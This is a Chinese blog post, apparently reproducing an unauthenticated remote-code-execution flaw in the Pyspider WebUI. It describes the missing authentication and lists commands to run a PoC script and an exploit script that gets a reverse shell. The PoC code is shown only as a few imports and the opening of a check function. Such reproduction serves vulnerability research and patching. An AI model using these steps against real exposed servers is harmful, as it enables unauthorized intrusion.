热门标签
热门文章
- 17.牛批了 Android 2022高级资深面试题 一线大厂和二线大厂面试真题精选 (大疆 附答案)第七套 30k+_大疆车载android面试题
- 2【Python】 已解决:ModuleNotFoundError: No module named…_python modulenotfounderror: no module named
- 3Docker(23) - 注册 docker hub 的账号
- 4微软数字签名获取方法
- 5线性代数讲什么?_线性代数讲的什么内容
- 6超全总结!Pythorch 构建Attention-lstm时序模型 !!
- 7学习Autodock分子对接_autoduck
- 8Kafka、RabbitMQ和RocketMQ对比_rabbitmq和rocketmq和kafaka
- 9vue的安装与配置_vue安装及环境配置
- 10三种简单方法将 OnePlus 文件传输到您的电脑_一加手机备份到电脑
当前位置: article > 正文
【漏洞复现】Pyspider webui未授权访问导致RCE_pyspider webui存在未授权访问致远程代码执行漏洞
作者:笔触狂放9 | 2024-08-09 19:36:35
赞
踩
pyspider webui存在未授权访问致远程代码执行漏洞
影响范围
Pyspider webui
基本介绍
Pyspider是一个采用Python语言编写的爬虫系统,功能非常强大,它采用分布式架构,支持多种数据库后端,强大的WebUI支持脚本编辑器,任务监视器,项目管理器以及结果查看器,而偏偏有些开发人员把这个webui开到公网上面,而webui本身没有任何形式的验证机制并且允许远程执行python代码
漏洞检测
python3 poc.py
反弹shell
python3 exp.py
成功反弹shell:
漏洞POC
- import IPy
- import requests
- import datetime
- def check_fast(ip,port):
- '''
- fast check
- check title onl
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/笔触狂放9/article/detail/954809
推荐阅读
相关标签
